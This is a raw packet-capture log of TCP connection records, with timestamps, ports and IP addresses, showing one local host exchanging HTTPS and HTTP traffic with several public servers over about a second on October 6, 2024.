                                                                                                                            Oct 6, 2024 13:50:09.949258089 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.949320078 CEST49757443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.949325085 CEST4434975713.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.949758053 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.949827909 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.949945927 CEST49767443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.949959993 CEST4434976723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.950015068 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.950036049 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.950090885 CEST49756443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.950100899 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.950258970 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.950304031 CEST49756443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.950606108 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.950624943 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.950628996 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.950638056 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:09.950913906 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951045990 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951087952 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951122999 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.951127052 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951165915 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951188087 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.951220036 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951301098 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.951859951 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951908112 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951948881 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.951956034 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.951970100 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.952022076 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.952023029 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.952033997 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.952084064 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.952090979 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.952198982 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.952403069 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.953104019 CEST49772443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.953115940 CEST4434977223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.955508947 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.955771923 CEST4434975813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.955822945 CEST4434975813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.955897093 CEST49758443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.955899000 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:09.955914974 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.956727982 CEST49756443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.956734896 CEST4434975613.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.957118034 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.957205057 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.957253933 CEST49769443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.957405090 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.957642078 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.957703114 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:09.958059072 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:09.958064079 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.958384037 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.958724976 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.958787918 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.958821058 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.958846092 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.958852053 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.958892107 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.958914042 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.958920002 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.958978891 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.959325075 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:09.959427118 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.959568977 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:09.959582090 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.960721970 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.960778952 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.960834980 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.964297056 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:09.964369059 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:09.964374065 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.964396000 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.965209007 CEST49768443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:09.965219975 CEST44349768104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.968540907 CEST49769443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.968549967 CEST4434976923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.969804049 CEST49758443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.969804049 CEST49758443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.969810009 CEST4434975813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.969819069 CEST4434975813.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.970871925 CEST49771443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.970876932 CEST4434977123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.972029924 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.972204924 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.972260952 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.972270012 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.972369909 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.972413063 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.972419024 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.972513914 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.972557068 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.972879887 CEST49770443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:09.972887039 CEST4434977023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.974402905 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.974409103 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.974447012 CEST49759443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.974452019 CEST4434975913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.980834007 CEST49779443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.980896950 CEST4434977913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.981718063 CEST49779443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.981966019 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.982011080 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.982050896 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.982064962 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.982095957 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.982116938 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.983247042 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.983293056 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.983347893 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.983360052 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.983403921 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.983423948 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.984193087 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.984239101 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.984268904 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.984282017 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.984313011 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.984329939 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.984338045 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.984365940 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.984395027 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.984530926 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.984596014 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.985259056 CEST49755443192.168.2.6163.181.92.228
                                                                                                                            Oct 6, 2024 13:50:09.985285997 CEST44349755163.181.92.228192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.991583109 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.995377064 CEST49780443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.995377064 CEST49779443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.995397091 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.995431900 CEST4434977913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.995595932 CEST49780443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.996226072 CEST49780443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.996237040 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.997184038 CEST49781443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.997231960 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.997353077 CEST49781443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.997498035 CEST49781443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.997526884 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.998605967 CEST49782443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.998615026 CEST4434978213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.998707056 CEST49782443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:09.999027967 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:09.999042988 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.999089956 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:09.999402046 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.999492884 CEST44349754184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:09.999684095 CEST49754443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:10.000699997 CEST49783443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.000710964 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.000744104 CEST49782443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.000760078 CEST4434978213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.000782013 CEST49783443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.004194021 CEST49783443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.004206896 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.019962072 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.019969940 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.020703077 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.020703077 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.020719051 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.070535898 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.070553064 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.070746899 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.070765018 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.070776939 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.070816040 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.070818901 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.070889950 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.100414991 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:10.104516983 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.104620934 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.104660034 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:10.143551111 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.143618107 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.143624067 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.143640041 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.143670082 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.143677950 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.143709898 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.143721104 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.143721104 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.143762112 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.198343039 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.198354006 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.198375940 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.198407888 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.198415041 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.198544979 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.198544979 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.226455927 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.230911016 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.230937958 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.230993986 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.231009960 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.231019974 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.231060028 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.232434034 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.232453108 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.232522964 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.232527018 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.232609034 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.232650995 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.233294010 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.233370066 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.233398914 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.233453035 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.237008095 CEST8049766165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.237039089 CEST8049766165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.237052917 CEST8049766165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.237083912 CEST8049766165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.237098932 CEST8049766165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.237116098 CEST4976680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:10.237214088 CEST4976680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:10.248537064 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.254432917 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.329618931 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.329651117 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.330177069 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.330202103 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.330286026 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.330295086 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.330821037 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.330838919 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.330848932 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.330883026 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.330924034 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.330929995 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331051111 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.331126928 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331166029 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331187010 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.331195116 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331239939 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.331248045 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331337929 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331367016 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331398964 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.331459999 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331480026 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.331510067 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.331516981 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.331609011 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.331892967 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.333738089 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.333944082 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.358181953 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.358313084 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.358515024 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.358982086 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.362642050 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.362821102 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.362828970 CEST44349773142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.362853050 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.362870932 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.362878084 CEST44349774142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.362943888 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.362951994 CEST44349777142.250.185.193192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.407531977 CEST4976680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:10.408715010 CEST49777443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.408716917 CEST49774443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.456171036 CEST49773443192.168.2.6142.250.185.193
                                                                                                                            Oct 6, 2024 13:50:10.488924980 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.501008034 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.501024008 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.502104044 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.502697945 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.502872944 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.503038883 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.503931046 CEST49776443192.168.2.6151.101.130.137
                                                                                                                            Oct 6, 2024 13:50:10.503956079 CEST44349776151.101.130.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.511401892 CEST49778443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:10.511409044 CEST44349778104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.547430038 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.579155922 CEST49785443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:10.579205036 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.579291105 CEST49785443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:10.579971075 CEST49785443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:10.579988003 CEST44349785104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.599318981 CEST49786443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:10.599345922 CEST44349786184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.599416018 CEST49786443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:10.602329016 CEST49786443192.168.2.6184.28.90.27
                                                                                                                            Oct 6, 2024 13:50:10.602339983 CEST44349786184.28.90.27192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.618963003 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.619093895 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.619184971 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.619308949 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.619318008 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.619370937 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.619375944 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.619493008 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.619668007 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.621203899 CEST49784443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:10.621215105 CEST44349784104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.644344091 CEST4434978013.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.650099039 CEST4434978113.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.650486946 CEST4434978313.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.655143976 CEST4434978213.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.656863928 CEST4434977913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.676781893 CEST49779443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.676814079 CEST4434977913.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:10.681710958 CEST49779443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:10.681744099 CEST4434977913.107.246.60192.168.2.6
